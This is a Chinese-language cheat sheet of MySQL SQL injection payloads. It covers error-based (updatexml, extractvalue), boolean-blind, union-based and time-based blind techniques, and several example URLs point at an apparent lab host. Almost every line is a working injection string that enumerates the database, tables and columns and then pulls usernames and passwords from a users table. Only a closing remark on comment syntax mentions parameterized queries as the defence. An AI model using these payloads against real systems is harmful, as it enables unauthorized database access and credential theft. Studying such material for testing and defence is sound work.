sql注入常见语句

报错注入(updatexml,依赖页面回显数据库错误信息):

and updatexml(1,concat(0x7e,(database()),0x7e),1) --+
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
and updatexml(1,concat(0x7e,(select group_concat(0x7e,id,0x7e,username,0x7e,password,0x7e) from users),0x7e),1) --+

布尔盲注

http://172.168.30.176/web/sql/boolean.php?id=1' and length(database())>=4 --+  正常
http://172.168.30.176/web/sql/boolean.php?id=1' and length(database())>=5 --+  异常
http://172.168.30.176/web/sql/boolean.php?id=1' and substr(database(),1,1)='t' --+
http://172.168.30.176/web/sql/boolean.php?id=1' and substr((select table_name from information_schema.tables where table_schema='test' limit 0,1),1,1)='z' --+
http://172.168.30.176/web/sql/boolean.php?id=1' and substr((select column_name from information_schema.columns where table_schema='test' and table_name='users' limit 0,1),1,1)='z' --+
http://172.168.30.176/web/sql/boolean.php?id=1' and substr((select username from users limit 0,1),1,1)='z' --+

普通注入(联合查询注入)

http://172.168.30.176/web/sql/union.php?id=1' 报错
http://172.168.30.176/web/sql/union.php?id=1 and 1=1 正常
http://172.168.30.176/web/sql/union.php?id=1 and 1=2 异常
http://172.168.30.176/web/sql/union.php?id=1 order by 6  正常
http://172.168.30.176/web/sql/union.php?id=1 order by 7  报错或异常
http://172.168.30.176/web/sql/union.php?id=-1 union select 1,2,3,4,5,6
http://172.168.30.176/web/sql/union.php?id=-1 union select 1,(database()),3,4,5,6
http://172.168.30.176/web/sql/union.php?id=-1 union select 1,(select table_name from information_schema.tables where table_schema='test' limit 0,1),3,4,5
http://172.168.30.176/web/sql/union.php?id=-1 union select 1,(select column_name from information_schema.columns where table_schema='test' and table_name='users' limit 0,2),3,4,5,6
http://172.168.30.176/web/sql/union.php?id=-1 union select 1,(select group_concat(id,0x3e,username,0x3e,password) from users),3,4,5,6
1 or 1=1 --+
1 or 1=2 --+
union select (select database()),2 --+
union select (select group_concat(table_name) from information_schema.columns where table_schema='security'),2 --+
union select (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),2 --+
union select (select group_concat(username) from users),2 --+

报错注入(extractvalue):

and extractvalue(1,concat(1,(select database()))) --+
and extractvalue(1,(select group_concat(table_name) from information_schema.columns where table_schema='security')) --+
and extractvalue(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')) --+
and extractvalue(1,(select group_concat(password) from users)) --+

时间盲注:

1" and if(length(database())=8,sleep(6),1) -- 
or if(substr(database(),1,1)='s',sleep(6),1) --+
or if(substr((select table_name from information_schema.columns where table_schema='security' limit 0,1),1,1)='a',sleep(6),1) --+
or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='a',sleep(6),1) --+
or if(substr((select username from users limit 0,1),1,1)='a',sleep(5),1) --+

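MySQL 的注释:
--+ :一般在 URL 中使用,不在表单中使用。MySQL 的 -- 注释要求后面紧跟一个空白字符,而 URL 中的加号(+)会被解析成空格,所以 --+ 到达数据库时就是 "-- "
# :表单和 URL 中都可以用
-- - :在表单中使用
这些注释符只有在参数被直接拼接进 SQL 语句时才会截断原语句;使用参数化查询(预编译语句)时,它们只是普通的字符串数据。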
